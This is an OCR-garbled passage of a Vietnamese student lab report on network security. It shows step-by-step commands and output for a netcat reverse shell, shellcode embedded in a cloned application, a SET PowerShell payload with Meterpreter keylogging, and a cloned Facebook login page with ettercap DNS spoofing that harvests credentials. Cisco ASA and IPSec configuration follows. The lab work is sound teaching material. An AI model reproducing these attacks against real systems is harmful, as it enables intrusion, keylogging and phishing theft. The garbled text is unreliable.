.c vào máy victim

Một phần của tài liệu BÁO cáo THỰC HÀNH môn an toàn mạng nâng cao THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN (Trang 33)

Hình 49. Chép shellcode lên máy victimBước 10: Biên dịch và thực thi getshell Bước 10: Biên dịch và thực thi getshell

Hình 50. Biên dịch và thực thi shellcode trên máy victim

Bước 11: Quay lại máy attack , đã có kết nối từ máy victim và thực hiện chép file tcp_reverse.txt lên máy victim

root@ubuntu:/hocie/l.ablserverl# nano shelAcode.c

root@ubuntu:/home/l.ablserverl# gcc -fno-stack-protector -z execstack sh ellcode.c -o shellcode

*— nc -nvlp 9999 listening on [any] 9999 ...

connect to [192.168.36.155] írom (UNKNOWN) [192.168.36.166] 59096 whoami

root pwd

/home/lablserverl ỉfconfig

eth0 Link encap:Ethernet HIMaddr 0B:0c:29:91:44:ad

inet addr:192.168.36.166 Bcast:192.168.36.255 Mask:255.255.255.0 inetô addr: fe80 ::20C:29ff:fe91:44ad/64 Scope:Link

UP BROAOGAST RUNNING MULTICAST MTU:1500 Metric:! RX packets:672 errors:0 dropped:0 overruns:0 frame:0 TX packets:168 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000

RX bytes:63421 (63.4 KB) TX bytes:18761 (18.7 KB) lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0 Ĩnet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:65536 Metric:! RX packets:335 errors:0 dropped:0 overruns:0 frame:0 TX packets:335 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1

RX bytes:27151 (27.1 KB) TX bytes:27151 (27.1 KB) touch tcp_reverse.txt

Hình 51. Kiểm tra kết nối và chép file lên máy victimBước 12: Quay lại máy victim và đã có file tcp_reverse.txt Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt

Hình 52. Kết quả file chép từ attack lên victim đã có

3. Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực thiBước 1: Tìm source code từ git về Bước 1: Tìm source code từ git về

root@ubuntu:/home/lablserverl# git clone https://github.corn/bapzz/Steganography-l In-C.gtt

Hình 53. Source code một ứng dung trên gitBước 2: Chép tất cá shellcode vào file đã clone về từ git Bước 2: Chép tất cá shellcode vào file đã clone về từ git

'root@ubuntu:/home/tablserverl/Steganography-In-C# nano steganography .c

root@ubuntu:/home/tablserverl/Steganography-In-C# gcc -fno-stack-protector -z ex ecstack steganography.c -o shetttest

root@ubuntu:/home/tablserverl/Steganography-In-C# ./shelltest MA HOA VA GIA MA ____________ PROGRAM____________________ _________MA HOA__________________ _________GIA MA________________________ _________END______ shettcode tength : 17_______________________________________________________________ Hình 55. Tiến hành thực thi ứng dụng đã nhúng shellcode trên máy vitcim Bước 4: Mở handler bằng netcat trên máy attack và đã có kết nối

Hình 54. Chép shellcode vào ứng dụng đã clone vềBước 3: Tiến hành thực thi trên máy victim Bước 3: Tiến hành thực thi trên máy victim

® /home/nguyet/c-steganography/Steganography-In-C

ne -nvlp 9999 listening on [any] 9999 ...

connect to [192.168.36.155] from (UNKNOWN) [192.168.36.166] 40700

Hình 56. Mở handler trên máy attack và đã có kết nối

LAB 4 : THỰC HIỆN TẤN CÔNG SOCIAL ENGINEERING THƯỜNG DÙNG TRONG APT

Mô hình

Tên Hệ điều hành IP User

Máy attack Kali linux 192.168.36.155 Nguyet

Máy victim Ubuntu 192.168.36.166 Lab1server1

1. Cài mã độc tấn công Social Engineering

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Mebsite Attack Vectors

3) Iníectìous Medìa Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduĩno-Based Attack Vector

7) Bireless Access Poỉnt Attack Vector

8) QRCode Generator Attack Vector

9) Powershell Attack Vectors

10) Thỉrd Party Modules

99) Return back to the main menu. set> 9

The Powershell Attack Vector module allovưs you to create PowerShell speciíic attacks. These att acks will allow you to use PowerShell which is available by detault in all operating Systems wi ndows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and per íorming íunctions that do not get triggered by preventative technologies.

1) Powershell Alphanumeric Shellcode Injector

Hình 57. Chọn Powershell Attack Vectors

Sau đó, tiếp tục chọn Powershell Alphanumeric Shellcode Injector. Nhập địa chỉ IP của máy attacker để tiến hành tạo Virus tấn công. Sau đó chọn yes

The Pouíershell Attack Vector module allows you to create PowerShell specỉíic attacks. These att acks will allow you to ưse PowerShell which is available by detault in all operating Systems Wi ndows Vìsta and above. PowerShell provìdes a íruitíul landscape for deploying payloads and per íorming íunctions that do not get triggered by preventative technologies.

1) Powershell Alphanumeric Shellcode Injector

2) Powershell Reverse Shell

3) Powershell Bind Shell

4) Powershell Dump SAM Database

99) Return to Main Menu set:oowershell>l

Enter the IPAddress or DNS name for the reverse host: 192.168.36.155 set:powershell> Enter the port for the reverse [443]:443

[*] Prepping the payload for delivery and injecting alphanumeric shellcode ... [*] Generating x86-based powershell injection code ...

[*] Reverse_HTTPS takes a few seconds to calculate.. One moment.. No encoder speciíied, outputting raw payload

Payload size: 395 bytes Final size of c file: 1685 bytes

[*] Finĩshed generating powershell injection bypass. [*] Encoded to bypass execution restriction policy ...

[*] lí you want the powershell commands and attack, they are exported to /root/.set/reports/pow ershell/

set> Do you want to start the listener now [yes/no]: : yes

Bước 2: Copy file virus ra ngoài desktop đổi đuôi txt thanhg batBước 3: Trên máy victim tiến hành chạy fike virus Bước 3: Trên máy victim tiến hành chạy fike virus

Bước 4: Trên máy attacker tiến hành lấy thông tin từ máy victim bằng câu lệnh sessions -i

msf6 exploit( ) >

[*] started HTTP5 reverse handler on https://0.0.0.0:443

[!] https://0.0.0.0:443 handling reqưest írom 192.168.36.172; (UUID: 16fcjjitfl) without a databa se connected that payload UUID tracking will. not work!

[*] https://0.0.0.0:443 handling request írom 192.168.36.172; (UUID: l6fcjjwl) staging x86 payl oad (176220 bytes) ...

[!] https://®.0.0.0:443 handling request from 192.168.36.172; (UUID: I6fcjjwl) without a databa

se connected that payload UUID trackĩng will not work!

[*] Meterpreter sessỉon 1 apened (192.168.36.155:443 -* 127.0.0.1 ) at 2022-03-17 07:34:46 -040 0

[!] https://0.0.0.0:443 handling request írom 192.168.36.172; (UUID: 1.6fcjjwl) Without a databa se connected that payload UUID tracking witl not work!

[*J https://0.0.0.0:443 handling reqưest from 192.168.36.172; (UUID: 16fcjjwl) staging x86 payl oad (176220 bytes) ...

[!] https;//0.0.0.0:443 handling request írom 192.168.36.172; (UUID: l6fciiwl) without a databa

se connected that payload UUID tracking win. not work!

[*] Meterpreter session 2 opened (192.168.36.155:443 -» 127.0.0.1 ) at 2022-03-17 07:35:04 -040 ẽ

msf6 exploití ) > sessions -ĩ

Active sessions

Hình 59. Lấy thông tin từ máy nạn nhân Lệnh sysinfo và ipcofigId Name Type

1 meterpreter x86/wỉndows 2 meterpreter x86/wifidows Information DESKTOP-EPFSOĐJ\LENQVO a DE SKTOP-EPFSODJ Connection 192.168.36.155:443 -* 127.0 .0.1 (192.168.36.172) 192.168.36.155:443 127.0

meĩeroreter > sysinto

Computer : DESKTOP-EPFSODJ

05 : Windows 10 (10.0 Buitd 18363).

Archĩtecture : X86 System Language : en_us

ũómain : WORKGROUP

Logged On Users : 2 Meterpreter : x86/windows meterpreter > ipconíig Interface 1

Natne : Software Loopback Interíace 1

Hardware MAC : 00:00:00:60:00:00 MTU : 4294967295 ĨPv4 Address : 127.0.0.1 ĨPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : Interíace 4

Name : Intel(R) 82574L Gigabit Network Connection

Hardware MAC : 00:0c:29:cb:dc:89

MTU : 1500

Hình 60. Lệnh sysinfo Lệnh keyscan_start để tiến hành lấy dữ liệu từ máy victim Intertace 4

Intel(R) 82574L Gigabit Network Connection 00:0c:29:cb:dc:89 1500 192.168.36.172 255.255.255.0 fe80:: e4c2:c8bó:c52e:e533 keuscan start

Unknown command: keuscanstart meterpreter > keyscan_start

starting the keystroke sniffer ... meterpreĩer > keyscan_dump Dutnping captured keystrokes ... meterpreter > keyscan_stop stoppĩng the keystroke sniffer ... meterpreter > screenshot

Screenshot saved to: /usr/share/set/QhHSIIkV.ipeg meterpreter > I

Lệnh keyscan_dump để lấy dữ liệu từ máy victim Lệnh keyscan_stop để dừng lại

Lệnh screenshoot để chụp lại màn hình của máy victim 2. Demo tấn công bằng cách clone 1 link giả mạo Name Hardware MAC MTU IPv4 Address ĨPv4 Netmask IPv6 Address IPv6 Netmask lĩieterpreter >

Bước 1:Khởi động setoolkit để dùng công cụ Social-Engineering AttacksChọn mục Website Attack Vectors Chọn mục Website Attack Vectors

Setect from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Iníectious Media Generator

4) Create a Payload and Listener

5) Mass Mdiler Attack

6) Arduino-Based Attack Vector

7) Híreless Access Point Attack Vector

8) QRCode Generator Attack Vector

9) Powershell Attack Vectors

10) Third Party Mũdules

99) Return back to the main menu. set> 2

Hình 61. Chọn Website Attack Vectors Bước 2: Chọn mục Credential Havrester Attack Method

1) Java Applet Attack Methũd

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) HTA Attack Method

99) Return to Main Menu set:webattack>5

Hình 62. Chọn Credential Havrester Attack Bước 3: Chọn mục site cloner

—I UIILLlUlldLlLy .---

1) Web Templates 2) Site Cloner 3) Custom Import

99) Return to Mebattack Menu

set:webattack>2

Bước 4: Nhập địa chỉ IP của máy attack

set:webattack> IP address for the PŨST back in Harvester/Tabnabbing [192.168.36.155]:192.168.36 .155

[-] SET supports both HTTP and HTTPS [-] Example: http://viMMi.thisisafakesite.coin

set:webaĩtack> Enter the url to clone: V1MMI. facebook.com [*] cloning the website: https://login.íacebook.com/login.php [*] This could take a Little bit ...

Hình 64. Nhập IP máy attacker PARAM: signed_next= PARAM: trynum=l PARAM: timezone= PARAM: Lgndim= PARAM: lgnrnd=204516_UElT PARAM: lgnjs=n

PARAM: pref itl._contact_poínt» PARAM: prefill-SOurce* PARAN: prefill_type= PARAM: first_prefill_source= PARAM: first_prefill_type=

Hình 65. Thông tin lấy được từ máy victim

® /home/nguyet

ettercap ethB dns_spoof aro ///

ettercap 0.8.3.1 Copyright 2001-2020 Ettercap Development Team Lỉstenỉng on:

eth0 00:0C:29:CD:E6:F1 192.168.36.155/255.255.255.0 fe80 ::20c:29ff:fecd:e6fl/64

SSL dissection needs a vatid ■redir_command_on■ scrỉpt in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0. Prỉvileges dropped to EUID 0 EGID 0 ...

dns_spoof: etter.dns:62 Unknown record type PRT 34 plugins

42 protocol dissectors 57 ports monitored 28230 mac vendor fingerprint 1766 tcp os íingerprínt 2182 known Services

Lua: no Scripts were specified, not starting up! Chạy giả mạo website

Thông tin user và password lấy từ máy nạn nhân

root@>kalĩ: /home/nguyet

File Actions Edit View Help

GROUP 2 : ANY (all the hosts in the lỉst) starting Unified sniffing ...

Text only Interíace activated ... Hit ’ h' for inline hetp

Activatĩng dns_spoof plugin ...

dns_spoof: A [login.facebook.com] spooíed to [192.168.36.155] TTL [3600 s] dns_spoof: A [facebook.com] spooíed to [192.168.36.155] TTL [3600 s] ĐHCP: [00:0C:29:CD:E6:Fl] REQUEST 192.168.36.155

DHCP: [192.168.36.254] ACK : 192.168.36.155 25S.255.255.0 GW 192.168.36.2 DNS 192.168.36.2 "loc aldomain"

HTTP : 192.168.36.155:80 -> USER: testl9 PASS: 123 INEO: http://192.168.36.155/index2.htinl

CONTENT: jazoest=2104861sđ=AVruJlhLctY&display=&isprivate=&return_session=&skip_apĩ_login=&sĩgn ed_next=&trynum=l&timezone=&lgndifn=&lgnrnd=2®4516_UElT&lgnjs=n&email=testl9&pa5s=1236togin=16pr efìll_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefíll_type=&ha

d_cp_prefìlled=false&had_password_prefilled=false&ab_test_data= dns_spoof: A [login.facebook.com] spooíed to [192.168.36.155] TTL [3600 s] dns_spoof: A [facebook.com] spooíed to [192.168.36.155] TTL [3600 s]

HTTP : 192.168.36.155:80 -í USER: admin PASS: 123 INFO: http://192.168.36.155/index2.html

CONTENT: jazoest=21048&lsd=AVruJlhLctY5dÌ5play=&isprivate=&return_5e55Ìon=&5kip_api_login=&5Ìgn ed_next=&trynum=l&tỉmezone=&lgiidÌ!n=&lgrirnd=204516_UElT&lgnj s=n&email=admin&pass=123&login=l&pre

fill_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefill_type=&had _cp_prefilled=false&had_password_prefỉlted=false&ab_test_data=

dns_spoof; A [login.facebook.com] spooíed to [192.168.36.155] TTL [3600 s] I

Hình 66. Khi máy nạn nhân đăng nhập vào website giả mạo, máy attack có thể lấy được username và pasword

LAB 6 : CONFIG ASA BACSICYêu cầu: Yêu cầu:

1. Kết nối và cấu hình địa chỉ IP thiết bị theo mô hình

2. Cấu hình định tuyến trên FW và router R2 , đảm bảo người dùng trong vùng inside cóthể giao tiếp được với các server vùng DMZ thể giao tiếp được với các server vùng DMZ

3. Cấu hình FW chỉ cho phép PC với IP 192.168.2.10 được phép SSH vào FW

4. Cấu hình static NAT trên FW sao cho người dùng ngoài inetrnet chí có thể truy cập được dịch vụ Remote Desktop của server 192.168.10.10

5. Cấu hình PAT trên FW sao cho người dùng từ vùng inside có thể truy cập được các dịch vụ ngoài internet

Hình 67. Mô hình ASA

1. Cấu hình thông tin trên các cổng của FWCổng inside Cổng inside

ciscoasa(config)# interface eO ciscoasa(config-if) # nameií inside

INFO: Securitỵ level for "inside" set to 100 bỵ default. ciscoasa(config-if)# security-level 100

ciscoasa(config-if)# ip address 192.168.0.1 255.255.255.0

ciscoasa(config-if)# r

Hình 68. Thông tin cấu hình trên cổng inside Cổng DMZ

ciscoasa(config)# interface e2 ciscoasa(config-if) # nameif DMZ

INFO: Security level for "DMZ" set to 0 by default.

ciscoasa(config-if)# security-level 50

ciscoasa(config-if)# ip address 192.168.10.1 255.255.255.0

ciscoasa(config-if)# I

Hình 69. Thông tin cấu hình trên cổng DMZ Cổng outside

ciscoasa(config)# interface el ciscoasa(config-if)# nameif outside

ciscoasa(config-if)# securiity-level 0

A

ERROR: % Invalid input detected at 'A' marker.

ciscoasa(config-if)# security-level 0

ciscoasa(config-if)# ip address dhcp setroute

ciscoasa(config-if)# I

Hình 70. Thông tin cấu hình trên cổng outside 2. Cấu hình định tuyến

Cấu hình default-route trên router R2 Cấu hình static route trên FW

ciscoasa(config)# route inside 192.168.2.0 255.255.255.0 192.168.0.254

ciscoasa(coníig)# I_____________________________________________________

Hình 71. Thông tin cấu hình static route trên FW Mặc định ASA không cho phép icmp giữa các vùng, cần cấu hình thêm: ciscoasa(config)# policy-map global_policỵ

ciscoasa(config-pmap)# class inspection_default

ciscoasa(config-pmap-c)# inspect icmp

ciscoasa(config-pmap-c)# I

Hình 72. Thông tin cấu hình icmp trên FW 3. Cấu hình SSH trên FW

ciscoasa(coníig)# User waren password waren

ciscoasa(coníig)# crỵpto keỵ generate rsa general-keys INFO: The nante for the keỵs will be: <Default-RSA-Keỵ> Keỵpair generation process begin. Please wait...

ciscoasa(config)# ssh 192.168.2.10 255.255.255.255.inside

ERROR: % Invalid input detected at ’A' marker.

ciscoasa(coníig)# ssh 192.168.2.10 255.255.255.255 inside ciscoasa(coníig)# ssh version 2

ciscoasa(config)# aaa authentication ssh console LOCAL

ciscoasa(config)# I________________________________________

Sau đó ta có thể truy cập SSH từ PC 192.168.2.10

Hình 74. Kết quả SSH vào FW trên ( PC 192.168.2.10)

4. Cấu hình static NAT và ACL để cho từ bên ngoài có thể truy cập dịch vụ RemoteDesktop trên vùng DMZ Desktop trên vùng DMZ

Bước 1: Cấu hình object network:

ciscoasa(config)# object network DMZ_10.10

ciscoasa(config-network-object)# host 192.168.10.10

ciscoasa (confiq-network-ob~iect) # Ễ________________

Hình 75. Thông tin cấu hình object network Bước 2: Cấu hình object service:

ciscoasa(config-network-object)# object Service RDP

ciscoasa(config-service-object)# Service tcp source eq 3389

ciscoasa(config-service-object)# I

Hình 76. Thông tin cấu hình object service

Bước 3: Cấu hình NAT và cấu hình ACL để cho phép truy cập từ outside vào DMZ ciscoasa(config)# nat (DMZ,outside) source static DMZ_10.10 interíace Service $ ciscoasa(config)# access-list POLICY extended permit tcp any host 192.168.10.1$ ciscoasa(config)# access-group POLICY in interíace outside

ciscoasa(config)# [______________________________________________________________

Sau khi cấu hình, ta có thể truy cập dịch vụ remote desktop từ vùng outside ( cổng outside có địa chỉ: 192.168.36.151)

Hình 78. Thông tin cổng outside Etherneto manual Ethernetl DECP inside outside 192.168.0.1 255.255.255.0 192.168.36.151 255.255.255.0

® QEMU (Win) JR ITEORVN LAB FileZilla WinSCP Windows Security Iser name [ Cancel ]

Control Panel PuTTY Xshell

Enter your credentials

These credentials will be used to connect to 192.168.36.151. /3 Computer I Passvvord Domain: Eireíox Network Google Chrome Remember my credentials ITF EVKey WinRAR Xftp 3:18 PM 2/25/2022

Hình 79 kết quả remote desktop vào PC 192.168.10.10

Hình 80. Kết quả truy cập dịch vụ remote desktop từ PC ngoài vùng outside 5. Cấu hình PAT để cho phép người dùng từ inside có thể truy cập internet

ciscoasa(config)# nat (inside,outside) source dỵnamic USER interface

ciscoasa(config)# I

Hình 81. Thông tin cấu hình PAT cho phép inside truy cập internet Sau khi cấu hình xong, ta có thể truy cập internet

33 Àdministraton C:\Window5\5ystem32\cmd.exe

ỊPụ4 Address...: 192.168.2.10 Subnet Mask ... : 255.255.255.0 Delault Gateuay ... : 192.168.2.254 Ethernet adapter Npcap Loopback Adapter:

Connection— specỉíỉcDNS Suffix . :

AutoconEigurâtion IPụ4 Address. . : 169.254.81.134

Subnet Mask ... : 255.255.0.0 DePault Gateuap ... :

C:XUsersXlTFOBUN LAB>pinS 8.8.8.8 Pinging 8.8.8.8 uith 32 bptes of data:

Bepĩp ĩron 8.8.8.8: bptes-32 t irne =267rns TTL=Ỉ27 Beplý írori 8.8.8.8: býtes=32 tine=84ris TTL=Ỉ27 Beplý írori 8.8.8.8: býtes=32 tine=66ris TTL=Ỉ27 Beplý írori 8.8.8.8: býtes=32 tine=68ris TTL=Ỉ27 Pinsf statistics for 8.8.8.8:

Pachets: Sent = 4. Beceiued = 4. Lost = 0 <0Z loss). Approxỉmate round trỉp tines in ỊỊỊĨlli—seconds:

Mininun = 66ns. Maxinuri = 267ms. Auerage = 121ns C:XUsersXlTFOBUN LAB>

Hình 82. Kết quả truy cập internet từ PC (192.168.2.10) (inside)

Hình 83. Kết quả ping từ PC ( 192.168.2.10 inside) đến PC (192.168.10.10 DMZ)

Hình 84. Mô hình thực hiện cấu hình IPSEC VPN SITE TO SITE

1. Mô tả

Thực hiện cấu hình IPSec VPN giữa hai site đảm bảo mạng LAN thuộc SAIGON và VUNGTAU có thể giao tiếp đươc với nhau

2. Cấu hình

2.1 Cấu hình trên router SAIGON

Bước 1: Cấu hình chính sách IKE (chính sách pha 1)

SAIGON(config)#crypto isakmp policy 10

SAIGON(config-isakmp)#hash md5

SAIGON(config-isakmp)#encryption des

SAIGON(config-isakmp)#group 2

SAIGON(config-isakmp)#authentication pre-share

SAIGON (config-isakmp) #[]

Hình 85. Thông tin cấu hình chính sách IKE trên router SAIGON Bước 2: Xác định thông tin key và peer

SAIGON(config-isakmp)tauthentication pre-share

SAIGON(config-isakmp)#crypto isakmp keỵ warenl23 address 151.1.1.1 Hình 86. Thông tin key và peer trên router SAIGON

Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)

SAIGON(coníig)#crỵpto ipsec transform-set MYSET esp-des esp-md5-hmac SAIGON(cfg-crypto-trans)#1

Hình 87. Thông tin cấu hình chính sách IPSEC trên router SAIGON Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ

SAIGON(cfg-crypto-trans)#exit

SAIGON(coníig)#$ 100 permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 SaTGON írnn-ri rrì

Hình 88. Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ trên souter SAIGON Bước 5: Cấu hình crypto map

SAIGON(config)#crỵpto map MYMAP 10 ipsec-isakmp

% NOTE: This new crypto map will remain disabled until a peer and a valid access list have been configured.

SAIGON(config-crypto-map)#set peer 151.1.1.1

SAIGON (config-crypto-map) #set transform.-set MYSET SAIGON(config-crypto-map)#match address 100

SAIGON(config-crypto-map)#1

Hình 89. Cấu hình crypto map trên router SAIGON

2.2 Cấu hình trên router VUNGTAU

Bước 1: Cấu hình chính sách IKE (chính sách pha 1) VUNGTAU(config)#crỵpto isakmp policy 10 VUNGTAU(coníig-isakmp)#hasj md5

A

% Invalid input detected at 'A’ marker.

VUNGTAU(config-isakmp)#hash md5

VUNGTAU(config-isakmp)#encryption des

VUNGTAU(coníig-isakmp)#group 2

VUNGTAU(config-isakmp)#authentication pre-share

VUNGTAU (coníig-isakitip) #1______________________

Hình 90. Thông tin cấu hình chính sách IKE trên router VUNGTAU

VUNGTAU(config-isakmp)tauthentication pre-share

VUNGTAU(coníig-isakmp)#crỵpto isakmp keỵ warenl23 address 150.1.1.1

VUNGTAU(config)#1

Hình 91. Thông tin key và peer trên router VUNGTAU Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)

VUNGTAU(config)#crypto ipsec transform-set MYSET esp-des esp-md5-hmac

VUNGTAU(cfg-crypto-trans)#Ễ____________________________________________

Một phần của tài liệu BÁO cáo THỰC HÀNH môn an toàn mạng nâng cao THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN (Trang 33)

Tải bản đầy đủ (DOCX)

(69 trang)
w